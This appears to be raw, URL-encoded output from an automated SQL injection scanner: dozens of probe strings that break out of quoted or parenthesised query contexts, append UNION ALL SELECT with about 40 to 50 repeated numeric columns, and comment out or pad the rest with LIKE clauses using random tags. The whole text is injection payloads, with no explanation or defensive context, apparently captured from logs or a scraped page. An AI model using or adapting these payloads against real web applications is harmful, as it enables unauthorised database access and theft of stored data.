-6861%22%29%20UNION%20ALL%20SELECT%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%23%20AND%20%28%22kTMj%22%20LIKE%20%22kTMj -7763%22%29%20UNION%20ALL%20SELECT%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%23%20AND%20%28%22EgBt%22%20LIKE%20%22EgBt -9566%22%29%20UNION%20ALL%20SELECT%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%23%20AND%20%28%22kaRK%22%20LIKE%20%22kaRK -5795%22%29%20UNION%20ALL%20SELECT%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%23%20AND%20%28%22jCpH%22%20LIKE%20%22jCpH -2897%22%29%20UNION%20ALL%20SELECT%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%2C%205185%23%20AND%20%28%22PzXl%22%20LIKE%20%22PzXl -4003%22%29%29%20UNION%20ALL%20SELECT%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%23%20AND%20%28%28%22pbsM%22%20LIKE%20%22pbsM -8371%22%29%29%20UNION%20ALL%20SELECT%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%23%20AND%20%28%28%22kRnP%22%20LIKE%20%22kRnP -6140%22%29%29%20UNION%20ALL%20SELECT%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%2C%204393%23%20AND%20%28%28%22SYXU%22%20LIKE%20%22SYXU -3475%22%29%29%20UNION%20ALL%20SELECT%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%2C%207015%23%20AND%20%28%28%22CWGa%22%20LIKE%20%22CWGa -8142%22%29%29%20UNION%20ALL%20SELECT%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%23%20AND%20%28%28%22dpVs%22%20LIKE%20%22dpVs -4318%22%29%29%20UNION%20ALL%20SELECT%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%23%20AND%20%28%28%22BIQF%22%20LIKE%20%22BIQF -5387%22%29%29%20UNION%20ALL%20SELECT%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%23%20AND%20%28%28%22lLMd%22%20LIKE%20%22lLMd -3279%22%29%29%20UNION%20ALL%20SELECT%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%2C%201741%23%20AND%20%28%28%22Rdpc%22%20LIKE%20%22Rdpc -7318%22%29%29%20UNION%20ALL%20SELECT%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%2C%203422%23%20AND%20%28%28%22SFwF%22%20LIKE%20%22SFwF -5126%22%29%29%20UNION%20ALL%20SELECT%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%23%20AND%20%28%28%22jsfm%22%20LIKE%20%22jsfm -5027%22%29%29%29%20UNION%20ALL%20SELECT%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%23%20AND%20%28%28%28%22Tdjq%22%20LIKE%20%22Tdjq -8753%22%29%29%29%20UNION%20ALL%20SELECT%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%2C%201737%23%20AND%20%28%28%28%22VOSa%22%20LIKE%20%22VOSa -1948%22%29%29%29%20UNION%20ALL%20SELECT%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%2C%206746%23%20AND%20%28%28%28%22iKuY%22%20LIKE%20%22iKuY -1562%22%29%29%29%20UNION%20ALL%20SELECT%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%23%20AND%20%28%28%28%22TIDh%22%20LIKE%20%22TIDh -5499%22%29%29%29%20UNION%20ALL%20SELECT%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%23%20AND%20%28%28%28%22BwyG%22%20LIKE%20%22BwyG -9947%22%29%29%29%20UNION%20ALL%20SELECT%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%23%20AND%20%28%28%28%22VbwJ%22%20LIKE%20%22VbwJ -2836%22%29%29%29%20UNION%20ALL%20SELECT%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%2C%203576%23%20AND%20%28%28%28%22QCzP%22%20LIKE%20%22QCzP -7714%22%29%29%29%20UNION%20ALL%20SELECT%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%23%20AND%20%28%28%28%22gOTh%22%20LIKE%20%22gOTh -7285%22%29%29%29%20UNION%20ALL%20SELECT%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%2C%207342%23%20AND%20%28%28%28%22MnlD%22%20LIKE%20%22MnlD -2071%22%29%29%29%20UNION%20ALL%20SELECT%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%23%20AND%20%28%28%28%22qJXD%22%20LIKE%20%22qJXD -8277%22%20UNION%20ALL%20SELECT%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%23%20AND%20%22Hszb%22%20LIKE%20%22Hszb -8624%22%20UNION%20ALL%20SELECT%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%23%20AND%20%22drPt%22%20LIKE%20%22drPt -9128%22%20UNION%20ALL%20SELECT%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%23%20AND%20%22FIYB%22%20LIKE%20%22FIYB -7281%22%20UNION%20ALL%20SELECT%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%2C%202672%23%20AND%20%22ggGw%22%20LIKE%20%22ggGw -5203%22%20UNION%20ALL%20SELECT%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%23%20AND%20%22IDZi%22%20LIKE%20%22IDZi -1386%22%20UNION%20ALL%20SELECT%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%2C%204835%23%20AND%20%22Mltq%22%20LIKE%20%22Mltq -7577%22%20UNION%20ALL%20SELECT%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%2C%205563%23%20AND%20%22gQXE%22%20LIKE%20%22gQXE -7082%22%20UNION%20ALL%20SELECT%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%23%20AND%20%22hQqr%22%20LIKE%20%22hQqr -6646%22%20UNION%20ALL%20SELECT%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%2C%206920%23%20AND%20%22kBgq%22%20LIKE%20%22kBgq -2353%22%20UNION%20ALL%20SELECT%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%23%20AND%20%22eWWo%22%20LIKE%20%22eWWo -2453%29%20WHERE%208929%3D8929%20UNION%20ALL%20SELECT%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%23 -8163%29%20WHERE%206144%3D6144%20UNION%20ALL%20SELECT%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%2C%206144%23 -3666%29%20WHERE%202963%3D2963%20UNION%20ALL%20SELECT%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%23 -4956%29%20WHERE%204667%3D4667%20UNION%20ALL%20SELECT%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%2C%204667%23 -9877%29%20WHERE%204372%3D4372%20UNION%20ALL%20SELECT%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%23 -7684%29%20WHERE%201216%3D1216%20UNION%20ALL%20SELECT%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%2C%201216%23 -6820%29%20WHERE%208372%3D8372%20UNION%20ALL%20SELECT%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%23 -3930%29%20WHERE%201754%3D1754%20UNION%20ALL%20SELECT%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%23 -7817%29%20WHERE%203592%3D3592%20UNION%20ALL%20SELECT%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%2C%203592%23 -6316%29%20WHERE%205775%3D5775%20UNION%20ALL%20SELECT%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%2C%205775%23 -8700%27%29%20WHERE%204560%3D4560%20UNION%20ALL%20SELECT%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%23 